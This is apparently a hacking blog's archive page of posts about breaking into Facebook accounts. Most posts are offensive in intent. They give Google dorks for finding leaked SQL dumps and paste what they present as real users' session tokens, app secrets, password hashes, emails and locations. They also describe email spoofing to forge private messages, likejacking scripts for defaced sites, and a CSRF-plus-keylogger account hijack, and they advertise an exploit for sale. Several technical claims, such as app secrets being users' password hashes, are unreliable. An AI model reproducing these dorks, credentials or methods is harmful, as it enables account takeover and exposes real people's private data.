Showing posts with label Facebook Hacking. Show all posts
Showing posts with label Facebook Hacking. Show all posts

Sunday, October 6, 2013

|| Facebook Account Reset Hijack Trick ||



Hiii a friend of mine is selling an exploit Hack Any Facebook Account Without User Name And Password if you are interested in purchasing contact him on above link or contact him on fb
https://www.facebook.com/CyberBoss.Net
Read More...

Monday, June 3, 2013

|| SEND & RECEIVE EMAIL VIA FB ||


Hello Friends this is the guest post mailed to us by Harshit Shukla

Today i am going to show you how to send mail from fb to the person who is not on fb and we get reply from both side...........:) 
See the images & follow the instruction-
1- Go to msg's and type the email whom you want to send...
2- We see that our msg sents easily.....;)
3- The person recieves our msg and he replied.....
4- Wow!! we see a new msg in our fb inbox.....enjoy ;)






Read More...

Tuesday, May 21, 2013

|| Facebook Password Changer Private by Mauritania Attacker||




The Exploit is called Facebook Password Changer

This plugin : https://www.facebook.com/ajax/settings/account/password.php?__user=100005682817150&__a=1&__dyn=7n8ahxoNpE42&__req=7

is for facebook password system , it uses JSON and Javascript and it has the token code of the password of accounts used by JSON system (JSCC.get(\"j0pvq5nqynwdmOkIAD0\")

So i coded that script wich will be able to change the password of any account automatically
using TamperData ^_^

I retrieved all the javascript inisde :

https://www.facebook.com/settings?tab=account&section=password&view

Wich could help me ^_^

So we can say that this method is like Privilege Escalation Exploit and CSRF ^_^

We can also use a javascript Keylogger with the Parameters of that plugin
and retrieve the Parameters and put them inside TamperData and we can HIJACK directly the account of our victim.

Link:-
Comming Soon
Read More...

Tuesday, May 14, 2013

|| Facebook session Exploit Priv8 ||



###############################################
#Title: Facebook session Exploit Priv8 
#Description : Parameters Logins Facebook
#Exploitation: Manually and use your Brain ^_^
#Date: 12/05/2013
#Author: Mauritania Attacker 
#Greetz : All AnonGhost Members <3
###############################################




Hi All Today i'm going to Explain about the new Exploit i found in Facebook , This time it's an advanced Exploit ^_^ i'm going to explain

step by step.

First , Facebook Token is a Code wich from you can access to another account or view Datas given by your friend , or by an admin of a page or an application.



POC : https://graph.facebook.com/303943362983320/accounts/test-users?installed=true&name=test&permissions=read_stream&method=post&access_token=303943362983320|gdHOjhabhCio0zTGiYKDhZcuUo0



So the Token Code is : gdHOjhabhCio0zTGiYKDhZcuUo0 


Before the Token Code we have "|" do not forget like you see in the url.


The Id of the Application is : 303943362983320




So here is the results as you can see :


{

   "id": "100005941890185",
   "email": "test_yqvqkrx_test\u0040tfbnw.net",
   "access_token": "CAAEUb1QutZAgBAKZBAZCw0C5iwP6vcrm6ZARLLuVZCyopLmfGC8ReGrN9jBLt8KcDoybAPJ0qZAZCUZBHFyZCU4xsFT4VvjaCbJisW7dflRZBvroVbeFUJg9PMwFgV0tO83LteqJOCiRGLWXnnsiS0BrPZANGFObF5gmI0ZD",
   "login_url": "https://www.facebook.com/platform/test_account_login.php?user_id=100005941890185&n=cNdaa9hGgmzmcvi",
   "password": "147905033"
}


#We can see the password and the login url but this method is just to get Users of a Facebook Application.


#So now let's get inside the serious things Facebook `ci_sessions` is the Log sent by "login.facebook.com" to another servers that are using 

Facebook Plugins or Modules and it has all parameters of the Logins of Accounts used by Most of the Websites and the best thing is that the Hash password is
in MD5 (ascii Text) that mean that it can be decrypted without any problem ^_^ .

#There is Also A second Log called `WRITE` you can try to find another Logs Var , \!/ Hacking is Art of Exploitation \!/




Parameters are :


*fb_apiid

*fb_apikey
*fb_secret (Password of the Account in Hash MD5)
*fb_accesstoken
*fb_uservisitor
*facebook_id
*facebook_name
*facebook_first_name
*facebook_last_name
*facebook_link
*facebook_username
*facebook_hometown (tracer)
*facebook_location (tracer)

#These are the most Important Parameters of a Facebook account and there is all parameters in the Exploit and also i wanted to show you these two importants

Parameters :

*facebook_hometown (tracer)

*facebook_location (tracer

#It shows how can Facebook trace people and where is the locations saved in their Database ,you can even use a php Backdoor Script with that Parameters

and you will receive all Details in your email \!/

#So You can see that Facebook has been totally exploited ^_^ and now i leave you with the Datas so you can be sure that you understand the Exploit.



*Example Of Facebook `ci_sessions` :



Facebook `ci_sessions`  "id\";s:1:\"1\";s:4:\"\";s:9:\"\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"223122544391265\";s:9:\"fb_apikey\";s:15:\"223122544391265\";s:9:\"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\";s:3:\"url\";s:29:\"apps.facebook.com/oinstaller/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:14:\"fb_uservisitor\";s:15:\"100001444879309\";s:11:\"facebook_id\";s:15:\"100001444879309\";s:13:\"facebook_name\";s:13:\"Owen Peredo D\";s:19:\"facebook_first_name\";s:4:\"Owen\";s:18:\"facebook_last_name\";s:8:\"Peredo D\";s:13:\"facebook_link\";s:34:\"http://www.facebook.com/owenperedo\";s:17:\"facebook_username\";s:10:\"owenperedo\";s:17:\"facebook_hometown\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:17:\"facebook_location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:12:\"facebook_bio\";s:21:\"Alegre y divertido!!!\";s:13:\"facebook_work\";a:1:{i:0;O:8:\"stdClass\":5:{s:8:\"employer\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"145505632143902\";s:4:\"\";s:8:\"Sysdecom\";}s:8:\"location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:8:\"position\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"131462966897408\";s:4:\"\";s:19:\"Gerente Propietario\";}s:11:\"description\";s:27:\"Systems development Company\";s:10:\"start_date\";s:7:\"2008-01\";}}s:15:\"facebook_sports\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"103998839637434\";s:4:\"\";s:20:\"Association football\";}}s:23:\"facebook_favorite_teams\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:12:\"197394889304\";s:4:\"\";s:12:\"FC Barcelona\";}}s:26:\"facebook_favorite_athletes\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"176063032413299\";s:4:\"\";s:9:\"Leo Messi\";}}s:29:\"facebook_inspirational_people\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:11:\"19987834992\";s:4:\"\";s:11:\"Hilary Duff\";}}s:18:\"facebook_education\";a:3:{i:0;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106494992721308\";s:4:\"\";s:24:\"joseph nicolas maldonado\";}s:4:\"type\";s:11:\"High School\";}i:1;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106233722748482\";s:4:\"\";s:4:\"UMSS\";}s:4:\"type\";s:7:\"College\";}i:2;O:8:\"stdClass\":3:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106462112722590\";s:4:\"\";s:30:\"Centro Boliviano Americano CBA\";}s:4:\"year\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"201638419856163\";s:4:\"\";s:4:\"2011\";}s:4:\"type\";s:7:\"College\";}}s:15:\"facebook_gender\";s:4:\"male\";s:17:\"facebook_timezone\";i:-4;s:15:\"facebook_locale\";s:5:\"en_US\";s:18:\"facebook_languages\";a:2:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"110343528993409\";s:4:\"\";s:7:\"Spanish\";}i:1;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106059522759137\";s:4:\"\";s:7:\"English\";}}s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-08-10T12:59:54+0000\";s:16:\"campaign_user_id\";s:1:\"5\";s:10:\"fanpage_id\";s:15:\"181056671916971\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001444879309\";s:10:\"user_token\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:16:\"id_pageinstalled\";s:2:\"63\";s:14:\"isFanpageAdmin\";b:1;}'),('63207e3bb6293317511e1731de110bdc','186.22.142.214','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1318966975,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:14:\"fb_uservisitor\";s:9:\"689991521\";s:11:\"facebook_id\";s:9:\"689991521\";s:13:\"facebook_name\";s:14:\"Matias O\'Keefe\";s:19:\"facebook_first_name\";s:6:\"Matias\";s:18:\"facebook_last_name\";s:7:\"O\'Keefe\";s:13:\"facebook_link\";s:37:\"http://www.facebook.com/matias.okeefe\";s:17:\"facebook_username\";s:13:\"matias.okeefe\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:23:\"matias.okeefe@gmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-17T12:06:55+0000\";s:16:\"campaign_user_id\";i:7;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:9:\"689991521\";s:10:\"user_token\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('b20a63bc8a68f130feb7321c58b56d8d','190.244.13.94','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.',1318967000,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:14:\"fb_uservisitor\";s:15:\"100000365619835\";s:11:\"facebook_id\";s:15:\"100000365619835\";s:13:\"facebook_name\";s:13:\"House Gregory\";s:19:\"facebook_first_name\";s:5:\"House\";s:18:\"facebook_last_name\";s:7:\"Gregory\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100000365619835\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:20:\"sfarsuau@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"en_US\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-06T22:24:58+0000\";s:16:\"campaign_user_id\";i:8;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:15:\"100000365619835\";s:10:\"user_token\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('9f82abf03ee6c9c9c052d306452b72d2','200.125.109.35','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1318967163,'a:19:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:0:\"\";s:14:\"fb_uservisitor\";s:0:\"\";s:16:\"campaign_user_id\";s:0:\"\";s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:0:\"\";s:10:\"user_token\";s:0:\"\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('bab185c44a703272b8324c3915e14f45','190.16.128.144','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1319156401,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:14:\"fb_uservisitor\";s:15:\"100001952113675\";s:11:\"facebook_id\";s:15:\"100001952113675\";s:13:\"facebook_name\";s:11:\"Enzo Sifrub\";s:19:\"facebook_first_name\";s:4:\"Enzo\";s:18:\"facebook_last_name\";s:6:\"Sifrub\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100001952113675\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:31:\"francisco.valenzuela@frubis.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-20T14:53:31+0000\";s:16:\"campaign_user_id\";i:9;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001952113675\";s:10:\"user_token\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('3a6f810a85da6f7045d88aad108f33f3','190.224.151.198','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1319156419,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:14:\"fb_uservisitor\";s:10:\"1089777996\";s:11:\"facebook_id\";s:10:\"1089777996\";s:13:\"facebook_name\";s:17:\"Luciano Balmaceda\";s:19:\"facebook_first_name\";s:7:\"Luciano\";s:18:\"facebook_last_name\";s:9:\"Balmaceda\";s:13:\"facebook_link\";s:39:\"http://www.facebook.com/lucho.balmaceda\";s:17:\"facebook_username\";s:15:\"lucho.balmaceda\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:27:\"lucho.balmaceda@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-19T14:48:37+0000\";s:16:\"campaign_user_id\";i:10;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:10:\"1089777996\";s:10:\"user_token\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}');

*Example of Facebook `WRITE` session :


(6,'fbsecret','823215e0b822191b1451b7f48f877dd5'),

(5,'fbapi','ffc4ba57627eebfd1d41ca7d7107123e'),
(7,'pageid','188846611127079'),
(8,'pagename','St Maria Goretti Church'),
(9,'pagetoken','122582234479418|a17360823010b076c960588f-58100826|188846611127079|F7ae3Q3oYkZsu6TwJls-7EZx8PM'),
(10,'Cancellations','2'),
(11,'Bulletins','3'),
(12,'Cancellations/Delays','4'),
(13,'Church Blog','')

#Dorks that you can use or create your own Dorks ^_^ 



Dork1: ext:sql "fb_secret\"


Dork2: ext:sql "fb_username\"


Dork3: ext:sql "fb_id\"


Dork4: ext:sql "fb_secret\" ci_sessions


Dork5 : ext:sql "fb_secret\" WRITE



#Demo :


*User Facebook : facebook_username\";s:10:\"owenperedo                     ================>>> Username Facebook : www.facebook.com/owenperedo


*Pass Facebook : \"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\    ================>>> Password Facebook : 49c853d3d0718fd0419fd58ac183bbce (MD5)


#Note that almost of CMS like "Wordpress" , "Joomla" , "Drupal" , etc.. and another Websites has this Bug you can find the Datas in any extensions : 


"sql" , "xml" , "dat" , "txt"


Last Exploit Found in Twitter : http://www.hackerzadda.com/2013/05/twitter-exploit-priv8-2013.html


Enj0y Fucking Facebook Accounts ^_^


Mauritania Attacker Was here ^_^


\!/
Read More...

Monday, May 6, 2013

|| FREE Facebook Privacy Vulnerability Create Private Messages from Anyone 0day worth 700$||


Facebook Privacy Vulnerability Create Private Messages from Anyone worth 700$ for FREE!!!!!
Full title:Facebook Privacy Vulnerability Create Private Messages from Anyone
Date add:2013-02-05
Category:web applications
Verified:Verified
Risk:
Affected ver:
www.facebook.com
Platform:tricks
Tested on:www.facebook.com
Vendor:www.facebook.com
Views:23786
Comments:37


Price:
700



What you will need  ???
1 Email id of the victim1 which he uses for FB

2 Facebook username of victim2 who will receive message from victim1.
To get that just go to Victim2 facebook profile
fb.com/victim2
Hence we can determine his fb inbox that will be victim2@facebook.com

3 A good mail spoofer 

Source code
In my mailer in from write the victim1 orginal eamil id which he uses to  login in to FB
And in Mail to write the vicitim2 facebook email id
write your message and send


Now how it works -
According to fb if you mail a person on his @facebook.com id the message
goes to his inbox, but we want that a particular victim should send message 
so we spoof the email of that victim1.
It goes like 
victim1@gmail.com sends mail to victim2@facebook.com 
and the message goes in to inbox of victim2 as if its send by victim one

Video tut and P0C
Read More...

Sunday, May 5, 2013

|| Facebook Application Database Disclosure Exploit 2013 ||




#######################################################
# Title: Facebook Application Database Disclosure                                                #
# Exploitation : Manually                                                                                           #
# Dork : ext:sql intext:@facebook.com email pass                                                #
# Date: 01/05/2013                                                                                                   #
# Author: Mauritania Attacker                                                                                 #
# Greetz : All AnonGhost Members <3                                                                   #
#######################################################


Facebook use 3 kind of Algorithms of Cryptology for the Password of Users.

First type is Decypher Md5 wich is for the principal System of Facebook it is used By Ruby On Rails for the Database of Facebook and it is protected and take a lot of time to be decrypted ^_^ 

Here are some examples of Accounts Decyphered °_°
--------------------------------------------------------------------------------
Click here to see

http://zyan.me/xZEjG

As you can see the Database is avalaible ^_^ ! now you can exploit all this manually just use your brain and create a nice dork for yourself XD !!!

"Hacking is art of exploitation"

This is just the basic Method , the priv8 method is only for AnonGhost Members ^_^  \!/"But Sharing is Caring" \!/



Mauritania Attacker.


Read More...

Wednesday, April 10, 2013

|| FACEBOOK LIKE JACKING ||


Hie Frnds :)

i m back With 1 UseFul Topic

i.e Facebook Like Jacking !! :D

Using It u can Increase u r Fb Pages Likes !

Rapidly n Anonymously  //

Just Follow My Video  :)



Download The File Which is Use in the Video

Direct Video LinkDownload

Header Part : Download

Body PartDownload

Note To Hacker's : 

1 : You Can Use it in u r Deface Page Also :) 

2 : If u put this Script in Index of "High Traffic Domains" Insted of Defaceing then u can get Mass Like's Also :)

Condition : Facebook Must Be Logged in


Hope You all Like It :)

Any Query or Advise then cmnt it :)
Read More...

Thursday, March 28, 2013

|| Facebook 0day 2013 ||



#############################################################
# Title: Exploit Facebook Via External Plugins and Modules  
# Exploitation: Manually (use your brain ^_^)
# Date:  28/03/2013 
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################

For Example my victim is =======>>>  https://www.facebook.com/gaturro22
How i could be able to retrieve his password ? easy
Proof of Concept : Facebook Id ====>>> gaturro22
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So as you can see we got the email & the password : 
email: gonza.la22@gmail.com

password: e10adc3949ba59abbe56e057f20f883e

Another Demo : http://www.salondaddy.com/profile.php?ID=85


So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever

It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are

backdoored with a javascript malware that can sniff all your informations ^_^

So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites

especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!

So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users ^_^ no doubt , just use your brain !

Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top

Check this :  [NickName] => orso44  ===========>>> add this to www.facebook.com

http://www.facebook.com/orso44   ============>>> Facebook Profile

[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5


Another Victim :  ==========>>> https://www.facebook.com/kornberg

Infos Retrieved :

                    [_iProfileID] => 7893
                    [_aProfile] => Array
                        (
                            [datafile] => 1
                            [ID] => 7893
                            [NickName] => Kornberg
                            [Email] => anselmpennell435@yahoo.com
                            [Password] => 087fbfdeb33dae28260cfdb8f2d8a787
                            [Status] => Active
                            {
                            "id": "862420463",
                            "name": "Zoe Kornberg",
                            "first_name": "Zoe",
                            "last_name": "Kornberg",
                            "username": "kornberg",
                            "gender": "female",
                            "locale": "en_US"
                            }

Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand

I just selected  this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!



Read More...

Sunday, February 24, 2013

|| TRUTH OF FACEBOOK HACKING ||



                        ARTICLE ON
                      EXPOSING FACEBOOK HACKING
                          OR
         THE TRUTH BEHIND THE FACEBOOK HACKING

In the depth of crisis, hacking over the INTERNET is still a very big problem. First of all I would like to throw some light on what basically hacking is and who the hackers actually are. Hackers are the persons who actually secure your system or the network are the WHITE HAT persons, the people who actually do hacking are crackers or the BLACK HAT persons. I am writing this article just to aware the people, what actually the hacking is and how they can protect themselves from hackers and their children from being exploited. Guys I thoroughly want to tell you that there is no such kind of FACEBOOK HACKING. These are just the rumors outside these days of facebook hacker. I will come to show you live example that how these kinds of tools and websites are made just to hack you people. Now let’s begin our talk with the websites out there on the INTERNET which in bold letters say – “COME AND HACK ANY FACEBOOK ACCOUNT ONLINE IN MINUTES”. Haha what a beautiful line written over here. Then it will ask for “Enter the e-mail address you want to hack” and then they will say login in our website to check for the password. But there is nothing, then they surely will ask for some donation and whatever the username or password you will enter the same they going to apply on your facebook id with some brute force attacks. Now when you register as a new member they will send you the link on your email-id that you have provided, now let’s watch what happen.
Check my facebook and yahoo both are open at that particular time

  Now what is going to happen next?
There is something we call as cookies. Actually cookies are stored in your web browser containing the username and passwords of your entire mail id. Now what Black hat’s do is, when you click on these links they take you to some place and suddenly the downloading starts up on. And you don’t actually care but what exactly happens is all you’re saved passwords with mail id gone to the person.

Now let’s see I have prepared a something as cookie grabber which grabs my cookies stored in the web browser.
Now whatever the cookies are stored in your browsers it will simply goes to the server having your file.

 Now this screen shot clearly shows that the username or the e-mail Id’s are being sent to the hacker’s PC in a notepad file.

 Now not only the password but the IP address -- the private IP address of your PC with the MAC address to the attacker’s PC in the form of the logs.

 So far we have talked about the websites having such schemes of facebook hacking. Now let’s talk about the tools they give you to hack. What exactly they did is they bind their own key logger or some kind of RAT file behind their .exe files which you mostly people download. And then what happens is all your information containing the cookies, your history, your PC’s information or sometimes your whole PC to the attacker’s machine.

Like I have shown below:

Now in the end I would like to tell you what exactly the hacking of facebook means. Hacking of facebook or g-mail or yahoo mail means that extracting out the database not the passwords. Yea I know that these are the columns inside any table name of the facebook’s database. So guys I humbly request you all people please get out of this rumor of facebook hacking. Those tools those websites are just meant to hack you people. 
Some of the lines in the I would like to share to warn GIRLS how they are being exploited through these social networking websites.


Also, many articles are coming in the newspapers even on the hacking news website not to upload your information on any of the social networking sites like Facebook. The Girls who actually are the victims are mostly those who upload their pictures on facebook, and the narrow minded people on the other side just copy their pictures, edit them and again upload on Facebook in order to make their facebook page attractive or making the fake accounts by that girl’s name. In order to protect yourself from being hacked and exploited you should not upload any of your information on any of the social networking site. The main question is “How actually the accounts are being compromised?” and “How crackers or the malicious persons cracked into your yahoo or the g-mail accounts? “
The answer is very simple. Its just because of weak protection that many people are unaware of what services are being provided to them. Now a days g-mail is coming with the 2-step verification protection that’s a very good protection that g-mail is providing. When you just login into your g-mail account it will ask for g-mail code to login into your account and that secret code is being sent to your cell phone by the Google itself.   Similarly, Facebook is also protected in the same way. When you fill your authentication to login into facebook it has provided a check point from where you have logged into your account and if any other person logged into your account without your permission it will immediately message to your cell phone with time. Also, after you are done with your FB account, logout your account so that cookie session also gets over. Keep updating your passwords after a week in order to keep yourself safe. Password should be like “#$%ALIVedark92@!#” (that includes characters, alphabets, numbers etc) so it will be difficult for any of the cracker to crack it.  Keep on checking your mails daily. Update your PC (personal computer) daily. Avoid downloading any software from entrusted sites that doesn’t having SSL (secures socket Layer) certificates. Always check the URL while logging into your accounts it will save you from phishing (The fake page method of hacking). Always use a third party firewall and a software like bit defender anti-virus to get protection from virus and malwares. Always install key logger into your system to keep on monitoring what actually your children are doing on the system. Key logger is basically monitoring based software that takes a snapshot of all the things that a user does on the system.
Taking some small steps and by being more careful, you can protect yourself and your loved ones from the Black Hat hackers.
Thanking you in anticipation. 

THE ARTICLE HAS BEEN SUBMITTED BY Deepanshu Khanna CREATOR OF THE WEBSITE http://hackcrack4u.blogspot.in
Read More...

Thursday, December 27, 2012

How to make your own java drive | Clone any webpage video tutorial





Checkout my previous tut about what is java drive and how to setup a java drive?
Here is the tutorial how to clone any webpage and turn into a java drive:




Download required files from here
Read More...

Friday, April 13, 2012

|| FACEBOOK WALL FLOOD LATEST METHOD ||


HELLO EVERYONE TODAY ILL SHOW YOU A VIDEO ON HOW TO FLOOD SOMEONE'S FACEBOOK WALL WITH THE HELP OF LIVE HTTP HEADER ADDON



YOU CAN ALSO DOWNLOAD IT FORM HERE
Read More...

Thursday, February 2, 2012

How I dumped profile pics of first 10000 Facebook users within few hrs.


This Post is Originally posted by Debasish Mandal on his website www.debasish.in
A clip form the movie "The Social Network"


Hi all,In this article I am going to tell you guys how I have downloaded profile / Cover picture of first ten thousand Facebook user within few hours using a python script of near about 100 lines. Here I have used Facebook graph api and An html comment present in profile page of Facebook(You will get to know more about this later on).

So what is Facebook graph api?

Using Facebook graph api you can retrieve  few profile information of a Facebook user, like profile id ,First Name Last Name,Facebook username ,user’s gender and locale.
To get this information only thing you have to do is access following url.

http://graph.facebook.com/?id=<target profile id>

